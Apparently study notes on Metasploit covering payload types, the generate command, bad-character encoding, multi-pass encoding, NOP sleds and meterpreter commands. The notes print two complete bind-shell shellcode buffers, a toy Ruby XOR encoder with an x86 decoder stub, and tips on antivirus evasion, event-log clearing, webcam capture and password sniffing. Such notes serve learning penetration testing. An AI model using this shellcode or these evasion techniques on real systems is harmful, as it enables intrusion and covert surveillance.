Ruby Metasploit Content

The document provides information about generating and encoding payloads in Metasploit. It discusses using the 'generate' command to create shellcode, and options like -b, -f, -i, and -o to control payload generation (in the older generate syntax): -b excludes bad characters, -f saves to a file, -i specifies the number of encoding iterations, and -o sets payload options like the listen port. Encoding makes payloads larger and changes their byte pattern; multiple encoding passes are meant to make signature-based detection harder.

Uploaded by

febit57677
Copyright
© All Rights Reserved

notes for Metasploit

the complete guide for the msf is https://www.offensive-security.com/metasploit-unleashed/

best book to study msf is :-

everything is explained well in it

the framework files can be found in /usr/share/metasploit-framework

the msf architecture is like


***MSF::CORE*** //(contains the db, the module manager and the plugin manager)

provides the basic API


***MSF::BASE*** //(contains config, logging, sessions and so on)

provides the friendly API on top of core


some api to use for the framework //see the architecture photo
https://www.offensive-security.com/wp-content/uploads/2015/04/msfarch2-768x502.png

on top of these libraries sit the modules, which come in 6 types (Metasploit 5 added a seventh, evasion)


1. exploit
2. encoder
3. payload
4. nop
5. post
6. auxiliary

***MSF::UI***
above all these we have msf::ui

contains the CLI (msfconsole / msfcli (now removed) )


webui
gui and some drivers

the types of payload


1. singles:- self-contained, everything needed is in the one payload, so you can catch the shell with plain nc or
socat. These are more stable because they contain everything in one piece.

2. stagers:- work in conjunction with stage payloads to perform the
task. The stager is small: it sets up the channel between the victim and us and then
reads the stage into memory on the remote host (a.k.a. the victim).

3. stages
these are the payloads that are downloaded by the stager.
they provide the advanced features with no size limit, such as meterpreter,
vnc injection
**(Virtual Network Computing (VNC) is a graphical desktop sharing system that
uses the Remote Frame Buffer (RFB) protocol to remotely control another computer.)
**

ipwn **(iPwn is a framework meant for exploiting and gaining access to iOS
devices.)** for "iphone"

the module name tells you which kind you have: windows/shell_bind_tcp (one token) is a
single, windows/shell/bind_tcp (slash between them) is the stager bind_tcp plus the stage shell

***METERPRETER***
meterpreter, short for meta-interpreter, is an advanced, multi-faceted payload
that operates by

dll injection **(a technique used for running code within the address space of
another process by forcing it to load a dynamic-link library. DLL injection is
often used by external programs to influence the behavior of another program in a
way its authors did not anticipate or intend.)**

meterpreter resides entirely in memory on the target and writes nothing to disk, so it
leaves few artifacts for disk-based forensics (it is still visible to memory forensics
and to EDR that watches for injection).

=========
Payloads
==========

***PASSIVEX***
PassiveX is a payload that can help in circumventing restrictive outbound
firewalls. It does this by using an ActiveX control to create a hidden instance of
Internet Explorer. Using the new ActiveX control, it communicates with the attacker
via HTTP requests and responses

***NoNX***

The NX (No eXecute) bit is a feature built into some CPUs to prevent code from
executing in certain areas of memory. In Windows, NX is implemented as Data
Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent
DEP.

***Ord***

Ordinal payloads are Windows stager based payloads that have distinct advantages
and disadvantages. The advantages being it works on every flavour and language of
Windows dating back to Windows 9x without the explicit definition of a return
address. They are also extremely tiny. However two very specific disadvantages make
them not the default choice. The first being that it relies on the fact that
ws2_32.dll is loaded in the process being exploited before exploitation. The second
being that it’s a bit less stable than the other stagers.

***IPv6***

The Metasploit IPv6 payloads, as the name indicates, are built to function over
IPv6 networks.

***Reflective DLL injection***

Reflective DLL Injection is a technique whereby a stage payload is injected into a
compromised host process running in memory, never touching the host hard drive. The
VNC and Meterpreter payloads both make use of reflective DLL injection.

***generating a payload for metasploit***


once we `use` a payload module, the console adds the payload-specific commands generate,
pry and reload

the simplest case is just running the generate command with no options

(note: the switch descriptions in these notes follow the older Metasploit Unleashed text.
In msf5/msf6, which the prompts below come from, `-f` selects the output format, `-o` names
an output file, `-n` sets the NOP sled length, and datastore options such as the listen
port are given as `LPORT=1234` after the switches; run `generate -h` for the current list.)


and the output looks like

```
msf6 payload(windows/shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

```

The sample code above contains an almost universal bad character, the null byte
(\x00). Granted some exploits allow us to use it but not many. Let’s generate the
same shellcode only this time we will instruct Metasploit to remove this unwanted
byte.

To accomplish this, we issue the generate command followed by the -b switch with
accompanying bytes we wish to be disallowed during the generation process.
```
msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xbb\x56\x23\x74\xe5\xdb\xdd\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x53\x31\x5e\x12\x03\x5e\x12\x83\x90\x27\x96\x10\xe0" +
"\xc0\xd4\xdb\x18\x11\xb9\x52\xfd\x20\xf9\x01\x76\x12\xc9" +
"\x42\xda\x9f\xa2\x07\xce\x14\xc6\x8f\xe1\x9d\x6d\xf6\xcc" +
"\x1e\xdd\xca\x4f\x9d\x1c\x1f\xaf\x9c\xee\x52\xae\xd9\x13" +
"\x9e\xe2\xb2\x58\x0d\x12\xb6\x15\x8e\x99\x84\xb8\x96\x7e" +
"\x5c\xba\xb7\xd1\xd6\xe5\x17\xd0\x3b\x9e\x11\xca\x58\x9b" +
"\xe8\x61\xaa\x57\xeb\xa3\xe2\x98\x40\x8a\xca\x6a\x98\xcb" +
"\xed\x94\xef\x25\x0e\x28\xe8\xf2\x6c\xf6\x7d\xe0\xd7\x7d" +
"\x25\xcc\xe6\x52\xb0\x87\xe5\x1f\xb6\xcf\xe9\x9e\x1b\x64" +
"\x15\x2a\x9a\xaa\x9f\x68\xb9\x6e\xfb\x2b\xa0\x37\xa1\x9a" +
"\xdd\x27\x0a\x42\x78\x2c\xa7\x97\xf1\x6f\xa0\x54\x38\x8f" +
"\x30\xf3\x4b\xfc\x02\x5c\xe0\x6a\x2f\x15\x2e\x6d\x50\x0c" +
"\x96\xe1\xaf\xaf\xe7\x28\x74\xfb\xb7\x42\x5d\x84\x53\x92" +
"\x62\x51\xc9\x9a\xc5\x0a\xec\x67\xb5\xfa\xb0\xc7\x5e\x11" +
"\x3f\x38\x7e\x1a\x95\x51\x17\xe7\x16\x4c\xb4\x6e\xf0\x04" +
"\x54\x27\xaa\xb0\x96\x1c\x63\x27\xe8\x76\xdb\xcf\xa1\x90" +
"\xdc\xf0\x31\xb7\x4a\x66\xba\xd4\x4e\x97\xbd\xf0\xe6\xc0" +
"\x2a\x8e\x66\xa3\xcb\x8f\xa2\x53\x6f\x1d\x29\xa3\xe6\x3e" +
"\xe6\xf4\xaf\xf1\xff\x90\x5d\xab\xa9\x86\x9f\x2d\x91\x02" +
"\x44\x8e\x1c\x8b\x09\xaa\x3a\x9b\xd7\x33\x07\xcf\x87\x65" +
"\xd1\xb9\x61\xdc\x93\x13\x38\xb3\x7d\xf3\xbd\xff\xbd\x85" +
"\xc1\xd5\x4b\x69\x73\x80\x0d\x96\xbc\x44\x9a\xef\xa0\xf4" +
"\x65\x3a\x61\x04\x2c\x66\xc0\x8d\xe9\xf3\x50\xd0\x09\x2e" +
"\x96\xed\x89\xda\x67\x0a\x91\xaf\x62\x56\x15\x5c\x1f\xc7" +
"\xf0\x62\x8c\xe8\xd0"

```

this time it avoids the \x00 (null byte)

also note the size: it is larger (355 bytes instead of 328), and the header now names the
encoder the framework picked, x86/shikata_ga_nai

During generation, every null byte had to be replaced (encoded) and a decoder stub
prepended, so that once in memory our bind shell still works: the stub restores the
original bytes before execution reaches them.

when `-b` is given, metasploit tries its encoders in rank order and uses the first (best)
one whose output contains none of the listed bytes

if too many bad characters are passed and no encoder can satisfy them, msf prints an
error on the console instead of a payload.
It's like removing too many letters from the alphabet and asking someone to write a
full sentence. Sometimes it just can't be done.

okay we are done with plain generation, now we will encode the payload
***ENCODING THE PAYLOAD DURING GENERATION***

As already said, the framework will use the best encoder possible when generating
the payload. There are many times when one needs to use a specific encoder
rather than what metasploit picks; that is done with the -e switch followed by the
encoder name, for example x86/nonalpha.

With x86/nonalpha, if everything went according to plan, our payload will not contain any
alphanumeric characters. But we must be careful when using an encoder other than the
default, as it tends to give a larger payload. For instance, this one is much
larger than our previous examples.

Our next option on the list is the -f switch. In the older syntax it saves our
generated payload to a file instead of displaying it on the screen; as always it
follows the generate command with the file path (in msf6 `-f` is the output format and
`-o FILE` writes the file).

///Generating Payloads with Multiple Passes///


==============================================

The next switch is -i (iterations). In a nutshell it tells msf how many times to
run the encoder over the payload before producing the final output. The idea is
stealth, i.e. anti-virus evasion.

with -i 2 the size of the payload increases, and the more passes, the larger it gets,
since each pass wraps the previous output in another decoder stub. The first bytes of
the code are no longer the same either.

the more iterations (-i), the less the bytes resemble the original payload; but do not
count on this alone for evasion, AV signatures commonly target the decoder stubs themselves
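The -b and -i behaviour above, as an added example (my own toy code, not the page's output and not Metasploit's encoder implementation): a minimal x86-32 XOR encoder with a hand-assembled JMP/CALL/POP decoder stub. `parse_buf` reads the `buf = "\x.." + ...` text that `generate` prints; `encode_once` searches for an XOR key such that neither the stub nor the encoded body contains a bad character, and raises when none exists (the "too many letters removed" case); `build` applies it for several iterations, so the size grows by one stub per pass. Assumptions: the stub uses `mov cl, len`, so each pass is limited to bodies of 255 bytes, and its bytes are fixed, unlike the polymorphic shikata_ga_nai stub, which is why the real output's first bytes differ per run while this toy's do not; the sample bytes are the first 42 bytes of the page's shell_bind_tcp output, used only as input data, not a working payload; the decoder is not executed on a CPU here, `decode_once` only models it to check the round trip.

```ruby
# Toy encoder modelling `generate -b <badchars> -i <n>` (added example, not
# Metasploit code). Assumptions: fixed hand-assembled x86-32 decoder stub with an
# 8-bit length (bodies of 1..255 bytes per pass); not executed here, only modelled.

STUB_LEN = 20 # bytes in decoder_stub

# Parse the Ruby-style text that `generate` prints ("\xfc\xe8..." + ...) into bytes.
def parse_buf(text)
  text.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }
end

# Hand-assembled x86-32 decoder loop. It runs first, XORs the `len` bytes that
# follow it in place with `key`, then falls through into the decoded body.
def decoder_stub(len, key)
  [
    0xeb, 0x0d,                   # jmp short +13  -> call_decoder
    0x5e,                         # decoder: pop esi   (esi = address of body)
    0x31, 0xc9,                   #   xor ecx, ecx
    0xb1, len,                    #   mov cl, len
    0x80, 0x36, key,              # decode: xor byte [esi], key
    0x46,                         #   inc esi
    0xe2, 0xfa,                   #   loop decode
    0xeb, 0x05,                   #   jmp short +5   -> body
    0xe8, 0xee, 0xff, 0xff, 0xff  # call_decoder: call decoder (pushes &body)
  ]
end

# One encoding pass: find a key so that stub + XORed body contains none of the
# bad characters. Raises when no key works, like msf does when the bad-character
# list is unsatisfiable.
def encode_once(body, badchars)
  unless (1..255).cover?(body.size)
    raise ArgumentError, "this toy stub only handles bodies of 1..255 bytes"
  end
  (1..255).each do |key|
    candidate = decoder_stub(body.size, key) + body.map { |b| b ^ key }
    return candidate if (candidate & badchars).empty?
  end
  raise "no XOR key avoids the #{badchars.size} listed bad character(s)"
end

# Software model of the stub's effect (the CPU would do this in place); used
# only to verify the round trip.
def decode_once(encoded)
  len, key = encoded[6], encoded[9] # operands of mov cl, len / xor byte [esi], key
  encoded[STUB_LEN, len].map { |b| b ^ key }
end

# Equivalent of `generate -b ... -i iterations`: each pass wraps the previous
# output (stub included) in another stub, so size grows by STUB_LEN per pass.
def build(payload, badchars: [0x00], iterations: 1)
  out = payload
  iterations.times { out = encode_once(out, badchars) }
  out
end

# Constructed sample: the first 42 bytes of the page's windows/shell_bind_tcp
# output. Only sample bytes for the encoder, not a runnable payload.
SAMPLE = parse_buf(<<~'BUF')
  "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
  "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
  "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
BUF

if $PROGRAM_NAME == __FILE__
  one = build(SAMPLE, badchars: [0x00], iterations: 1)
  two = build(SAMPLE, badchars: [0x00], iterations: 2)
  puts "original: #{SAMPLE.size} bytes, #{SAMPLE.count(0)} null bytes"
  puts "1 pass:   #{one.size} bytes, #{one.count(0)} null bytes"
  puts "2 passes: #{two.size} bytes, #{two.count(0)} null bytes"
  begin
    build(SAMPLE, badchars: (0x00..0xdf).to_a) # "too many letters removed"
  rescue RuntimeError => e
    puts "generation failed as expected: #{e.message}"
  end
end
```

Running it shows the 3 nulls in the sample disappear after one pass at a cost of 20 bytes, a second pass costs another 20, and a bad-character list that covers most of the byte range makes generation fail outright, which is the same failure the console reports.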

okay, by default the lport for a bind shell is 4444; in the older syntax we change it to 1234
with the `-o` switch as shown below

-o lport=1234,variable=value

you can change any datastore option like this before the payload is encoded (in msf6 the same
is written as `generate LPORT=1234`, or `set LPORT 1234` beforehand)

///Payload Generation Using a NOP Sled///


==========================================

when generating a payload, by default the output is in `ruby` syntax; not everyone codes
in it, so we have an option to emit the payload in a different language, e.g. c, perl,
java.

First let's look at a few different output formats and see how the -t switch is
used (older syntax; `-f` in msf6). Like all the other options, all that needs to be done
is type the switch followed by the format name as displayed in the help menu.

it goes like `generate -t c`


or `generate -t java`

the output then comes out in the chosen language

Adding a NOP (No Operation) sled is accomplished with the -s
switch followed by the number of NOPs (older syntax; `-n` in msf6). This will add the
sled at the beginning of our payload. Keep in mind the larger the sled the larger the
shellcode will be. So adding 10 NOPs will add 10 bytes to the total size.

syntax `generate -s 14`

Store Information in a Database Using Metasploit


=============================================

Setup our Metasploit Database

In Kali, you will need to start up the postgresql server before using the database.

```
root@kali:~# systemctl start postgresql
```

After starting postgresql you need to create and initialize the msf database with
msfdb init

```
root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
```

once msfconsole is connected (check with `db_status`), everything the framework learns
(hosts, services, creds, loot, notes) is saved in that database, and `workspace` keeps
different engagements separate from each other.

METERPRETER CMDS USED


-------------------
clearev :- clears the Application, System and Security event logs on a Windows target
(noisy: clearing the Security log is itself recorded as event ID 1102)

idletime:- displays the number of seconds that the user at the remote
machine has been idle

webcam_list:- displays the available webcams on the target host.

webcam_snap:- grabs a picture from a connected webcam on the target system

you can also load the python extension into meterpreter (`load python`): `python_execute`
runs a string of Python code and `python_import` loads a local .py file or module into the
remote interpreter, so the session can be used as a Python interpreter on the target

-------------------------------
================================
`auxiliary/scanner/ip/ipidseq`
================================
---------------------------------

IP ID sequence scanner module in msf: finds hosts with incremental IP ID generation,
i.e. candidates for the zombie in an nmap idle scan (nmap -sI)

`msf > use auxiliary/sniffer/psnuffle`


another module, a dsniff-style password sniffer that pulls credentials out of traffic on
the wire (e.g. pop3, imap, ftp, http)

# AVOIDING DETECTION BY ANTIVIRUS


the usual first step for avoiding detection is to encode the payload with an encoder, and
with multiple encoding passes

this does not always work: an antivirus such as AVG will sometimes still detect the
same payload, sometimes because of signature (flag) matching, and most of the time it
will notice

``{ addition:: a tool is out there which allows you to specify the wake (sleep) time of the
payload, which is very useful} ``

Earlier there were separate tools (msfpayload, msfencode) which are now merged into the
framework as msfvenom (which includes the encoders)

We can also combine encoding with other techniques (custom executable templates, our own
loader) rather than relying on the encoders alone

# THE HEAP SPRAY

a NOP is a no-operation instruction


on Intel x86 the one-byte opcode 0x90 is a nop, so a run of them forms a sled: execution
landing anywhere in the sled slides forward into the payload

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
...........snipped.....................

heap spraying allocates many copies of sled + payload on the heap so that a corrupted
pointer is likely to land inside one of the sleds

sorry to say, but study the nops and heap spray from the book, page 112

I'm not in the mood right now, so see the whole chapter (chapter 8)

###### SETOOLKIT ####################################
